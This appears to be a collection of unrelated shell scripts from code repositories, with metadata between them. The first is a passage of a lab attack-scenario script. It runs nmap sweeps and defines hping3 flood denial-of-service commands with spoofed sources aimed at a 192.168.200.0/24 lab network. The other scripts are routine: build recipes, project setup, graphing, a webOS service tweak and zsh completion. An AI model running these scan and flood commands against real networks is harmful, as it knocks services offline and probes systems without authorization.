printf "$current_time Performing scanning and toggle(intensity:$rand_intensity, time:$rand_time) with iot-toolkit..." 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt
printf $(eval $iot_scanning)
printf $(eval $iot_get_info)
printf $(eval $toggle_command)
x_current="Scanning + get_info + toggle"
else
printf "error in variants choice - do nothing"
fi
stop_current_time=$(date "+%Y.%m.%d-%H.%M.%S")
#logs
printf "\n\n$1) Scenario 4 \n *start: $start_current_time \n *stop: $stop_current_time \n *type: $x_current" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
}
#get the IPs on the network
IPS=$(nmap -n -sn 192.168.200.0/24 -oG - | awk '/Up$/{print $2}')
init_arrIPS=($IPS)
#hardcode router's IP
router="192.168.200.1"
#initial mapping of IP to MAC addresses for debugging
printf "Initial verification of IPs and MACs: \n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
sudo arp-scan 192.168.200.0/24 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf "\n\n"
#verify IPs for the attack
printf "\nInitial IPs scan:\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf ' *%s\n' "${init_arrIPS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf "\n\n"
#delete restricted IP addresses from the list (devices that should not be targeted in the attacks)
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.1$") #router
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.2$") #firewall/syslog
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.3$") #firewall/syslog
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.134$") #attacker's computer in the lab
#mapfile -d $'\0' -t arrIPS < <(printf '%s\0' "${arrIPS[@]}" | grep -Pzv "^192.168.200.133$") #Kali virtual machine on Gosia's laptop
#https://stackoverflow.com/questions/16860877/remove-element-from-array-shell
#the below doesnt work - deletes the whole 192.168.200.1 sequence pattern from every element
#declare -a new_arrIPS=( ${arrIPS[@]/192.168.200.134/} )
#new_arrIPS1=( ${new_arrIPS[@]/^192.168.200.1$/} )
#echo ${new_arrIPS1[@]}
#the loop below works to restrict the array elements!! finally...
arrIPS=()
arr_restricted=("192.168.200.1" "192.168.200.2" "192.168.200.3" "192.168.200.134")
for i in "${init_arrIPS[@]}"
do
if [[ " ${arr_restricted[*]} " == *" $i "* ]]; then
echo "$i discarded"
else
arrIPS+=("$i")
fi
done
printf "\nIPs for attacks:\n" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
printf ' *%s\n' "${arrIPS[@]}" 2>&1 | tee -a scenarios_output/scenarios_log.txt -a scenarios_output/scenarios_terminal_output.txt
i=0
#main loop
while true
do
i=$((i+1))
#list of quick scanning attacks
arrQUICK=("sudo nmap -T4 -F -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-quick.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sn -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-ping.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sn --traceroute -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-quick_traceroute.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sV -T4 -O -F --version-light -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-quickscan_plus.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt")
#list of long scanning attacks
arrLONG=("sudo nmap -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-regular.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -T4 -A -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -sS -sU -T4 -A -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense_plus_udp.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -T4 -A -v -Pn -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense_noping.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt" "sudo nmap -p 1-65535 -T4 -A -v -oX ~/Desktop/ATTACKS/scenarios_output/nmap_results_xmls/scan$i-intense_allTCPports.xml 192.168.200.1-254 2>&1 | tee -a scenarios_output/scenarios_terminal_output.txt")
#list of denial of service attacks
arrDOS=("sudo hping3 -1 --flood --rand-source " "sudo hping3 -1 -C 3 -K 3 --flood --rand-source " "sudo hping3 -d 3000 --flood --frag -p 80 -S " "sudo hping3 --flood -d 3000 --frag --rand-source -p 80 -A " "sudo hping3 --flood -d 3000 --frag --rand-source -p 80 -R " "sudo hping3 --flood -d 3000 --rand-source -p 80 -F -S -R -P -A -U -X -Y " "sudo hping3 --flood --rand-source --udp --sign 'GGFlood' -p 80 ")
#pick random attack number
printf "\n Executing Main Loop\n"
scenario3 $i $arrIPS#how to call an attack
#if else
sleep 5s
done
| true
|
4a4c356b358e44bb13a97b01089620af11c0910b
|
Shell
|
sibuserv/lxe
|
/pkg/minizip.sh
|
UTF-8
| 1,335
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
#
# This file is part of LXE project. See LICENSE file for licensing information.
(
PKG=minizip
PKG_VERSION=${MINIZIP_VER}
PKG_SUBDIR=${PKG}-${PKG_VERSION}
PKG_SUBDIR_ORIG=zlib-${ZLIB_VER}
PKG_FILE=${PKG_SUBDIR_ORIG}.tar.gz
# https://www.zlib.net/
# http://www.winimage.com/zLibDll/minizip.html
PKG_URL="https://sourceforge.net/projects/libpng/files/${PKG}/${PKG_VERSION}/${PKG_FILE}"
PKG_DEPS="gcc zlib"
CheckPkgVersion
CheckSourcesAndDependencies
if IsBuildRequired
then
PrintSystemInfo
BeginOfPkgBuild
UnpackSources
PrepareBuild
SetBuildFlags
SetCrossToolchainPath
SetCrossToolchainVariables
cd "${PKG_SRC_DIR}"
cp -aT "${PKG_SUBDIR_ORIG}/contrib/minizip" "${PKG_SUBDIR}"
rm -rf "${PKG_SUBDIR_ORIG}"
unset PKG_SUBDIR_ORIG
export LIBTOOL="/usr/bin/libtool"
GenerateConfigureScript
ConfigureAutotoolsProject
BuildPkg -j ${JOBS} minizip miniunzip LIBTOOL="${LIBTOOL}"
InstallPkg install LIBTOOL="${LIBTOOL}"
CleanPkgBuildDir
CleanPkgSrcDir
if IsStaticPackage
then
rm -f "${SYSROOT}/usr/lib/libminizip.so"*
else
rm -f "${SYSROOT}/usr/lib/libminizip.a"
fi
fi
)
| true
|
e99b3f93b30209ea623ff511245548ddd1618897
|
Shell
|
codepulseme/week-planner
|
/cp-todo-backend/node-ts-api-starter.sh
|
UTF-8
| 1,869
| 4.125
| 4
|
[] |
no_license
|
#!/bin/bash
declare -a coreDeps=(body-parser debug express morgan firebase firebase-admin)
declare -a devDeps=(typescript gulp gulp-typescript chai chai-http mocha ts-node @types/body-parser @types/chai @types/chai-http @types/debug @types/express @types/mocha @types/morgan @types/node @types/firebase)
proj_dir=''
function installDeps() {
local args=("$@")
local nArgs=${#args[@]}
local category=$1
local deps=(${args[@]:1:$nArgs})
local len=${#deps[@]}
# TODO: concatenate dependencies and install everything at once
for (( i=0; i<$len; i++ )); do
local v=$(npm show ${deps[$i]} version)
if [[ $category == 'dev' ]]; then
npm install ${deps[$i]}@${v} --save-dev
else
npm install ${deps[$i]}@${v} --save
fi
done
}
function error() {
echo "Please sepcify the project location with the -d option."
exit
}
function init() {
echo "Initializing project. . ."
$(mkdir ${proj_dir})
cd ${proj_dir}
# initialize node.js
npm init -y
installDeps "core" "${coreDeps[@]}"
installDeps "dev" "${devDeps[@]}"
# TODO:
# 1. create tsconfig.json
# 1.1 configure the file with
# 2. mkdir src
# 3. create gulpfile.js
# 3.1 create gulpfile with tasks
# TODO: add option for installing database(s)
exit
}
function invalidFlag() {
local flag=$1
echo "Invalid flag: ${flag}"
exit
}
while getopts 'd:' flag; do
case "${flag}" in
d) proj_dir="${OPTARG}" ;;
*) invalidFlag ${flag} ;;
esac
if [[ -z $proj_dir ]]; then
error
elif [[ -d $proj_dir ]]; then
read -p "Directory ${proj_dir} already exists. Would you like to remove its contents and reinitialize (y/n)?" opt
if [[ $opt == 'y' || $opt == 'Y' ]]; then
echo "Force removing directory ${proj_dir}. . ."
$(rm -fr $proj_dir)
else
echo "Directory already exists. Please choose a different location or delete the directory."
exit
fi
fi
init
done
error
| true
|
b0497564e5f7535c6e38cd31607f2c9d9d74868f
|
Shell
|
t3ll0n/4103-101-OpSys-Smith
|
/assignments/homework-01/myrandom.sh
|
UTF-8
| 267
| 3.578125
| 4
|
[] |
no_license
|
#!/bin/bash
#This script prints a random word taken from the dictionary file
#located in the /usr/share/dict/words directory.
#pick one random from the dictionary and assign to variable
word=$(shuf -n1 /usr/share/dict/words)
#print results
echo "Random Word: "$word
| true
|
c8ebad1768b5e181226c0742ed45c18ccd4344f9
|
Shell
|
DJKessler/dot-files
|
/shell-configs/zsh-custom/macOs.zsh
|
UTF-8
| 268
| 2.859375
| 3
|
[] |
no_license
|
if [[ "$OSTYPE" == "darwin"* ]]; then
export PATH="/usr/local/bin:$PATH"
export PATH="/usr/local/opt/coreutils/libexec/gnubin:$PATH"
export MANPATH="/usr/local/opt/coreutils/libexec/gnuman:$MANPATH"
# remove duplicate entries from $PATH
typeset -aU path
fi
| true
|
bdf5f0cf104b9a4fe1f5e4eedc6541204897d628
|
Shell
|
nikhildhruwe/day8-assignment
|
/DiceCount.sh
|
UTF-8
| 865
| 3.515625
| 4
|
[] |
no_license
|
#!/bin/bash -x
declare -A Dice
count1=0
count2=0
count3=0
count4=0
count5=0
count6=0
flag=0
while (( $flag != 1))
do
check=$((RANDOM%6+1))
case $check in
1) ((count1++))
Dice[one]=$count1;;
2) ((count2++))
Dice[two]=$count2;;
3) ((count3++))
Dice[three]=$count3;;
4) ((count4++))
Dice[four]=$count4;;
5) ((count5++))
Dice[five]=$count5;;
6) ((count6++))
Dice[six]=$count6;;
esac
if (( ($count1==10) || ($count2==10) || ($count3==10) || ($count4==10) || ($count5==10) || ($count6==10) ))
then
flag=1;
fi
done
Max=0
Min=10
for key in ${!Dice[@]}
do
echo $key : ${Dice[$key]}
if ((${Dice[$key]}>$Max))
then
Max=${Dice[$key]}
MaxDice=$key
fi
if ((${Dice[$key]}<$Min))
then
Min=${Dice[$key]}
MinDice=$key
fi
done
echo " "
echo "Maximim times : $MaxDice"
echo "Minimum times : $MinDice"
| true
|
2bab6e14d7002fb3db0a73802449de6e62f994b3
|
Shell
|
AlexandreCo/Raspy-doc
|
/scripts/rf2txt/display.sh
|
UTF-8
| 3,758
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
NB_DAY=$1
ADDRESS=$2
NUM_CPT=$3
COLOR=$4
LOG_PATH=/var/www/GnOmeDataCenter/log_brut
LOG_OUT=/var/www/GnOmeDataCenter/out
DATE=`date "+%s"`
FILEOUT=$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_data.txt.png"
export GDFONTPATH=/usr/share/font/
if [[ $NB_DAY == 1 ]]
then
XFORMAT="%H:%M "
else
if [[ $NB_DAY == 7 ]]
then
XFORMAT="%H:%M-%d/%m "
else
XFORMAT="%d/%m "
fi
fi
function genere_single_cmd()
{
cat <<EOF
set terminal pngcairo enhanced font "arial,10" fontscale 1.0 size 500, 350
set output "$LOG_OUT/$FILEOUT"
set format x "$XFORMAT"
set key off
set style fill solid 1.00 border lt -1
set xdata time
set xtics border in scale 0,0 nomirror rotate by -45 offset character 0, 0, 0 autojustify
set xtics norangelimit font ",8"
set xtics ()
set timefmt "%Y-%m-%d:%H:%M:%S"
plot "single.dat$DATE" using 1:2 with filledcurves below x1 lt rgb '$COLOR' lw 2
EOF
}
function genere_rain_cmd()
{
cat <<EOF
set terminal pngcairo enhanced font "arial,10" fontscale 1.0 size 500, 350
set output "$LOG_OUT/$FILEOUT"
set format x "$XFORMAT"
set key off
set style fill solid 1.00 border lt -1
set xdata time
set xtics border in scale 0,0 nomirror rotate by -45 offset character 0, 0, 0 autojustify
set xtics norangelimit font ",8"
set xtics ()
set timefmt "%Y-%m-%d"
plot "rain.dat$DATE" using 1:2 with filledcurves below x1 lt rgb '$COLOR' lw 2
EOF
}
function genere_minmax_cmd()
{
cat <<EOF
set format x "$XFORMAT"
set key off
set style fill solid 1.00 border lt -1
set xdata time
set xtics border in scale 0,0 nomirror rotate by -45 offset character 0, 0, 0 autojustify
set xtics norangelimit font ",8"
set xtics ()
set timefmt "%Y-%m-%d"
plot "minmax.dat$DATE" using 1:3 with filledcurves above x1 lt rgb '$COLOR' lw 2
replot "minmax.dat$DATE" using 1:2 with filledcurves below x1 lt rgb 'white' lw 2
set terminal pngcairo enhanced font "arial,10" fontscale 1.0 size 500, 350
set output "$LOG_OUT/minmax_$FILEOUT"
replot
EOF
}
function split_file()
{
for i in `ls $LOG_PATH | grep "^201" | tail -n $NB_DAY`
do
FILENAME=$i
if [[ $NB_DAY == 1 || $NB_DAY == 7 ]]
then
cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;"| awk -F";" '{print $2":"$3" "$NUM_CPT}' NUM_CPT=$NUM_CPT>> single.dat$DATE
else
min=$(cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;" |cut -d';' -f$NUM_CPT| sort -n | head -1)
max=$(cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;" |cut -d';' -f$NUM_CPT| sort -n -r | head -1)
INDEX_DATE=`echo $FILENAME | cut -f1 -d '_'`
echo $INDEX_DATE $min $max >> minmax.dat$DATE
fi
done
}
function rain_file()
{
for i in `ls $LOG_PATH | grep "^201" | tail -n $NB_DAY`
do
FILENAME=$i
min=$(cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;" |cut -d';' -f$NUM_CPT| sort -n | head -1)
max=$(cat $LOG_PATH/$FILENAME | grep "^$ADDRESS;" |cut -d';' -f$NUM_CPT| sort -n -r | head -1)
if [ -n "$min" ]
then
total_rain=`expr $max - $min`
else
total_rain=0
fi
INDEX_DATE=`echo $FILENAME | cut -f1 -d '_'`
echo $INDEX_DATE $total_rain >> rain.dat$DATE
done
}
if [[ $NUM_CPT == 9 ]]
then
genere_rain_cmd >> rain.cmd$DATE
rain_file
gnuplot < rain.cmd$DATE
cp rain.dat$DATE /var/www/GnOmeDataCenter/log_brut/$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_rain.dat"
rm rain.cmd$DATE
rm rain.dat$DATE
else
if [[ $NB_DAY == 1 || $NB_DAY == 7 ]]
then
genere_single_cmd > single.cmd$DATE
split_file
gnuplot < single.cmd$DATE
cp single.dat$DATE /var/www/GnOmeDataCenter/log_brut/$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_single.dat"
rm single.dat$DATE
rm single.cmd$DATE
else
genere_minmax_cmd > minmax.cmd$DATE
split_file
gnuplot < minmax.cmd$DATE
cp minmax.dat$DATE /var/www/GnOmeDataCenter/log_brut/$ADDRESS"_"$NB_DAY"_"$NUM_CPT"_minmax.dat"
rm minmax.cmd$DATE
rm minmax.dat$DATE
fi
fi
| true
|
068eaf6ef353948588addf8462283e7fef966d1a
|
Shell
|
DavidBuchanan314/webos-homebrew-channel-1
|
/services/elevate-service
|
UTF-8
| 562
| 3.296875
| 3
|
[
"MIT"
] |
permissive
|
#! /bin/sh
set -e
SERVICE_NAME="${1:-org.webosbrew.hbchannel.service}"
echo "[ ] Elevating '$SERVICE_NAME'..."
sed -i 's;/usr/bin;/media/developer/apps/usr/palm/services/org.webosbrew.hbchannel.service;' /var/luna-service2-dev/services.d/$SERVICE_NAME.service
echo "[ ] Refreshing services..."
ls-control scan-services
#if [[ "$2" != "--no-restart" ]]; then
# echo "[ ] Restarting service..."
# pkill -x -f $SERVICE_NAME || echo " Not running."
#
# echo "[ ] Checking..."
# ls-monitor -i $SERVICE_NAME
# echo
# ps u -C $SERVICE_NAME
#fi
| true
|
85e83f96c8a245fdad38cdbfde449a5bec335208
|
Shell
|
frtrotta/script_correzione
|
/pull_repos.sh
|
UTF-8
| 973
| 3.828125
| 4
|
[] |
no_license
|
#!/bin/bash
echo "v0.3 - 16-feb-2015"
repository=$1
branch=$2
githubusers=$3
tokenfile=$4
if [ -z $repository ] || [ -z $branch ] || [ -z $githubusers ] || [ -z $tokenfile ]
then
echo "ERROR: missing parameter"
echo "$0 <repository> <branch> <githubusers_filename> <token_filename>"
exit 1
fi
token=`cat $tokenfile`
echo $token
temp=output.txt
curdir=`pwd`
errorreport="$curdir/${githubusers:0:${#githubusers}-4}_pulled.err"
rm $errorreport &> /dev/null
n=0
s=0
while read u;
do
n=$((n+1))
cd $u/$repository/
if [ $? -eq 0 ]
then
git pull $branch > "$temp"
if [ $? -eq 0 ]
then
s=$((s+1))
echo "==> $n: $u/$repository fetched"
else
echo "==> $n: ERROR: $u/$repository failed fetching"
echo "$u/$repository failed fetching\n" >> "$errorreport"
fi
cd ../..
else
echo "==> $n: ERROR: unable to find dir $u"
echo "$u unable to find dir" >> "$errorreport"
fi
done < $githubusers
echo "$n users read - $s repositories successfully pulled"
| true
|
8e0ca1db7ab89b63ce64a9108d39d6729086b7b6
|
Shell
|
zchee/zsh-default-completions
|
/src/Solaris/Command/_pkg5
|
UTF-8
| 12,455
| 2.984375
| 3
|
[] |
no_license
|
#compdef pkg
_pkg5_pkgs() {
local cache_policy cache_id=pkg5_installed_pkgs:$HOST:${pkg5_root//\//+}
typeset -a -g _pkg5_installed_pkgs
zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
if [[ -z "$cache_policy" ]]; then
zstyle ":completion:${curcontext}:" cache-policy _pkg5_installed_caching_policy
fi
if ( [[ $#_pkg5_installed_pkgs -eq 0 ]] || _cache_invalid $cache_id ) && ! _retrieve_cache $cache_id; then
_pkg5_installed_pkgs=( $(
pkg -R $pkg5_root list -H | while read pkg junk; do
pkga=( ${(s:/:)pkg} )
for i in {1..$#pkga}; do
print ${(j:/:)${pkga[$i,-1]}}
done
done) )
_store_cache $cache_id _pkg5_installed_pkgs
fi
compadd "$@" - ${_pkg5_installed_pkgs}
}
_pkg5_pkgs_a() {
local cache_policy cache_id=pkg5_known_pkgs:$HOST:${pkg5_root//\//+}
typeset -a -g _pkg5_known_pkgs
zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
if [[ -z "$cache_policy" ]]; then
zstyle ":completion:${curcontext}:" cache-policy _pkg5_known_caching_policy
fi
if ( [[ $#_pkg5_known_pkgs -eq 0 ]] || _cache_invalid $cache_id ) && ! _retrieve_cache $cache_id; then
_pkg5_known_pkgs=( $(
pkg -R $pkg5_root list -aH --no-refresh | while read pkg junk; do
pkga=( ${(s:/:)pkg} )
for i in {1..$#pkga}; do
print ${(j:/:)${pkga[$i,-1]}}
done
done) )
_store_cache $cache_id _pkg5_known_pkgs
fi
compadd "$@" - ${_pkg5_known_pkgs}
}
_pkg5_avoided_pkgs() {
compadd "$@" - $(pkg -R $pkg5_root unavoid)
}
_pkg5_pubs() {
compadd "$@" - $(pkg -R $pkg5_root publisher -H | awk '{print $1}')
}
_pkg5_variants() {
compadd "$@" - $(pkg -R $pkg5_root variant -H | awk '{print $1}')
}
_pkg5_facets() {
compadd "$@" - $(pkg -R $pkg5_root facet -H | awk '{print $1}')
}
_pkg5_known_caching_policy() {
[[ $pkg5_root/var/pkg/state/known/catalog.attrs -nt "$1" ]]
}
_pkg5_installed_caching_policy() {
[[ $pkg5_root/var/pkg/state/installed/catalog.attrs -nt "$1" ]]
}
_pkg5() {
local expl context state line pkg5_root prop
typeset -A opt_args
local -a subcmds pkg5_actions pkg5_cattr pkg5_sattr be_opts
local -a publisher_properties image_properties certs
subcmds=(
install uninstall list update refresh version help
info search verify fix revert contents image-create
{change-,}{variant,facet} avoid unavoid history
{{un,}set-,}property {add,remove}-property-value
{{un,}set-,}publisher purge-history rebuild-index
update-format freeze unfreeze {{un,}set-,}mediator
)
pkg5_actions=(
set depend dir driver file group hardlink legacy license link
signature unknown user
)
# Pseudo attributes for the contents subcommand
pkg5_cattr=(
action.hash action.key action.name action.raw
pkg.fmri pkg.name pkg.publisher pkg.shortfmri
)
# Pseudo attributes for the search subcommand
pkg5_sattr=(
$pkg5_cattr search.match search.match_type
)
publisher_properties=(
"signature-policy:value:(ignore verify require-signatures require-names)"
"signature-required-names:value:"
)
image_properties=(
"be-policy:value:(default always-new create-backup when-required)"
"ca-path:value:_path_files -/"
"check-certificate-revocation:value:(true false)"
"flush-content-cache-on-success:value:(true false)"
"mirror-discovery:value:(true false)"
"send-uuid:value:(true false)"
"signature-policy:value:(ignore verify require-signatures require-names)"
"signature-required-names:value:"
"trust-anchor-directory:value:_path_files -/"
"use-system-repo:value:(true false)"
)
if [[ $service == "pkg" ]]; then
_arguments -C -A "-*" \
'(-\? --help)'{-\?,--help}'[Help]' \
'-R[Root directory]:directory:_path_files -/' \
'*::command:->subcmd' && return 0
if (( CURRENT == 1 )); then
_wanted commands expl "pkg subcommand" compadd -a subcmds
return
fi
service="$words[1]"
curcontext="${curcontext%:*}=$service:"
fi
pkg5_root=${${${opt_args[-R]}:-$PKG_IMAGE}:-/}
certs=( $(pkg -R $pkg5_root property -H ca-path | awk '{print $2}')/* )
# Options common to subcommands which might have to deal with BEs.
# Note that --backup-be-name needs to precede --be-name in order to
# ensure that completion sees "--b" as being ambiguous.
be_opts=(
"(--require-new-be)--deny-new-be[Fail the operation if a new BE would be required]"
"(--deny-new-be)--require-new-be[Force a new BE to be created]"
"--backup-be-name[Specify the name for the backup BE]:BE name: "
"--be-name[Specify a BE name]:BE name: "
"--no-be-activate[Don't activate the new BE]"
"(--require-backup-be)--no-backup-be[Don't leave behind a backup BE]"
"(--no-backup-be)--require-backup-be[Force leaving behind a backup BE]"
)
case $service in
("install")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet]' \
'-v[Verbose]' \
'-g[Specify additional source of packages]:source:_path_files -/' \
"--accept[Accept all licenses]" \
"--licenses[Display all licenses]" \
"--reject[Specify an FMRI to exclude from the result]:fmri:_pkg5_pkgs" \
"--no-refresh[Don't refresh catalogs]" \
"--no-index[Don't reindex search database]" \
$be_opts \
'*:package:_pkg5_pkgs_a'
;;
("uninstall")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet]' \
'-v[Verbose]' \
$be_opts \
"--no-index[Don't reindex search database]" \
'*:package:_pkg5_pkgs'
;;
("update")
_arguments -A "-*" \
"-f[Don't check for pkg(5) updates]" \
'-n[Dry run]' \
'-q[Quiet]' \
'-v[Verbose]' \
'-g[Specify additional source of packages]:source:_path_files -/' \
"--accept[Accept all licenses]" \
"--licenses[Display all licenses]" \
$be_opts \
"--reject[Specify an FMRI to exclude from the result]:fmri:_pkg5_pkgs" \
"--no-refresh[Don't refresh catalogs]" \
"--no-index[Don't reindex search database]" \
'*:package:_pkg5_pkgs'
;;
("list")
_arguments -A "-*" \
'-H[Omit headers]' \
'-a[Show not-installed packages]' \
'-f[Show all versions]' \
'-g[Specify additional source of packages]:source:_path_files -/' \
'-n[Show newest versions]' \
'-s[Show summaries]' \
'-u[Show upgradable versions]' \
'-v[Show verbose pkg: FMRIs]' \
"--no-refresh[Don't refresh catalogs]" \
'*:package:_pkg5_pkgs_a'
;;
("refresh")
_arguments -A "-*" \
"--full[Full refresh]" \
'*:publisher:_pkg5_pubs'
;;
("info")
_arguments -A "-*" \
'--license[Display license text(s)]' \
'(-r)-l[Installed package]' \
'(-l)-r[Uninstalled package; fetch info from depot]:*:package:_pkg5_pkgs_a' \
'*:package:_pkg5_pkgs'
;;
("search")
_arguments -A "-*" \
"(-p)-a[Show matching actions]" \
'-l[Local search]' \
'(-a)-p[Show packages]' \
'-r[Remote search]' \
'-H[Omit headers]' \
'-I[Case sensitive search]' \
'-s[Depot URI]' \
'*-o[Attribute output]:attributes:_values -s , "attribute" $pkg5_sattr' \
':query:'
;;
("verify")
_arguments -A "-*" \
'-H[Omit headers]' \
'-q[Quiet]' \
'-v[Verbose]' \
'*:package:_pkg5_pkgs'
;;
("fix")
_arguments -A "-*" \
'--accept[Accept all licenses]' \
'--licenses[Display all licenses]' \
'*:package:_pkg5_pkgs'
;;
("revert")
_arguments -A "-*" \
'-n[Dry run]' \
'-v[Verbose]' \
'--tagged[Revert all tagged files]:tag:' \
$be_opts \
"--no-refresh[Don't refresh catalogs]" \
"--no-index[Don't reindex search database]" \
'*:file:_path_files'
;;
("contents")
_arguments -A "-*" \
'-H[Omit headers]' \
'-m[Print raw manifests]' \
'*-a[Attribute matching]:attribute=pattern:' \
'*-o[Attribute output]:attributes:_values -s , "attribute" $pkg5_cattr' \
'*-s[Sort key]:attribute:' \
'*-t[Action type]:action:_values -s , "action" $pkg5_actions' \
'-r[Fetch manifests from depot]:*:package:_pkg5_pkgs_a' \
'*:package:_pkg5_pkgs'
;;
("image-create")
_arguments -A "-*" \
'(-f --force)'{-f,--force}'[Force image creation]' \
'(-F --full -P --partial -U --user)'{-F,--full}'[Full image]' \
'(-F --full -P --partial -U --user)'{-P,--partial}'[Partial image]' \
'(-F --full -P --partial -U --user)'{-U,--user}'[User image]' \
'(-z --zone)'{-z,--zone}'[Zoned image]' \
'-k[Path to SSL key]:file:_path_files' \
'-c[Path to SSL cert]:file:_path_files' \
"--no-refresh[Don't refresh catalogs]" \
"*--variant[Specify image variants]:variant=instance:" \
"*--facet[Specify image facets]:facet=True/False:" \
'(-p --publisher)'{-p,--publisher}'[Specify publisher]:prefix=URI:' \
':directory:_path_files -/'
;;
("change-variant")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet'] \
'-v[Verbose'] \
'-g[Specify additional source of packages]:source:_path_files -/' \
'--accept[Accept all licenses]' \
'--licenses[Display all licenses]' \
$be_opts \
"*:variant:_values -s , 'variant' $(pkg -R $pkg5_root variant -H | awk '{print $1}')" \
;;
("change-facet")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet'] \
'-v[Verbose'] \
'-g[Specify additional source of packages]:source:_path_files -/' \
'--accept[Accept all licenses]' \
'--licenses[Display all licenses]' \
$be_opts \
"*:facet:_values -s , 'facet' $(pkg -R $pkg5_root facet -H | awk '{print $1}')" \
;;
("variant")
_arguments -A "-*" \
'-H[Omit headers]' \
'*:variant:_pkg5_variants'
;;
("facet")
_arguments -A "-*" \
'-H[Omit headers]' \
'*:facet:_pkg5_facets'
;;
("avoid")
_arguments -A "-*" \
'*:package:_pkg5_pkgs_a'
;;
("unavoid")
_arguments -A "-*" \
'*:package:_pkg5_avoided_pkgs'
;;
("set-property")
_arguments -A "-*" \
':property:_values "property" $image_properties' \
':value:'
;;
("add-property-value")
_arguments -A "-*" \
':property:_values "property" $image_properties' \
':value:'
;;
("remove-property-value")
_arguments -A "-*" \
':property:(${image_properties%%\:*})' \
':value:'
;;
("unset-property")
_arguments -A "-*" \
'*:property:(${image_properties%%\:*})'
;;
("property")
_arguments -A "-*" \
'-H[Omit headers]' \
'*:property:(${image_properties%%\:*})'
;;
("set-publisher")
_arguments -A "-*" \
'-P[Make preferred]' \
'(-e --enable)'{-e,--enable}'[Enable publisher]' \
'(-d --disable)'{-d,--disable}'[Disable publisher]' \
'(-g --add-origin)'{-g,--add-origin}'[Add origin URI]:uri:' \
'(-G --remove-origin)'{-G,--remove-origin}'[Remove origin URI]:uri:' \
'(-m --add-mirror)'{-m,--add-mirror}'[Add mirror URI]:uri:' \
'(-M --remove-mirror)'{-M,--remove-mirror}'[Remove mirror URI]:uri:' \
'-p[Repository URI]:url:' \
"--no-refresh[Don't refresh catalogs]" \
'--reset-uuid[Reset the image UUID for this publisher]' \
'--sticky[Make this publisher sticky]' \
'--non-sticky[Make this publisher non-sticky]' \
'--search-after[Set publisher search-order]:publisher:_pkg5_pubs' \
'--search-before[Set publisher search-order]:publisher:_pkg5_pubs' \
'--approve-ca-cert[Add trusted CA certificate]:CA cert path:_path_files' \
'--revoke-ca-cert[Revoke CA certificate]:CA cert hash:(${${certs#/etc/openssl/certs/}%.0})' \
'--unset-ca-cert[Remove trusted CA certificate]:CA cert hash:' \
'--set-property[Set publisher property]:property:_values "property" $publisher_properties' \
'--unset-property[Remove publisher property]:property:(${publisher_properties%%\:*})' \
'--add-property-value[Add publisher property value]:property:_values "property" $publisher_properties' \
'--remove-property-value[Remove publisher property value]:property:(${publisher_properties%%\:*})' \
':publisher:_pkg5_pubs'
;;
("unset-publisher")
_arguments -A "-*" \
'*:publisher:_pkg5_pubs'
;;
("publisher")
_arguments -A "-*" \
'-H[Omit headers]' \
'-P[Display only preferred publisher]' \
'-n[Display only enabled publishers]' \
'*:publisher:_pkg5_pubs'
;;
("history")
local -a hist_columns
hist_columns=(
"be" "be_uuid" "client" "client_ver" "command" "finish"
"id" "new_be" "new_be_uuid" "operation" "outcome"
"reason" "snapshot" "start" "time" "user"
)
_arguments -A "-*" \
'-H[Omit headers]' \
'-l[Long history]' \
'-n[Last n records]:number:' \
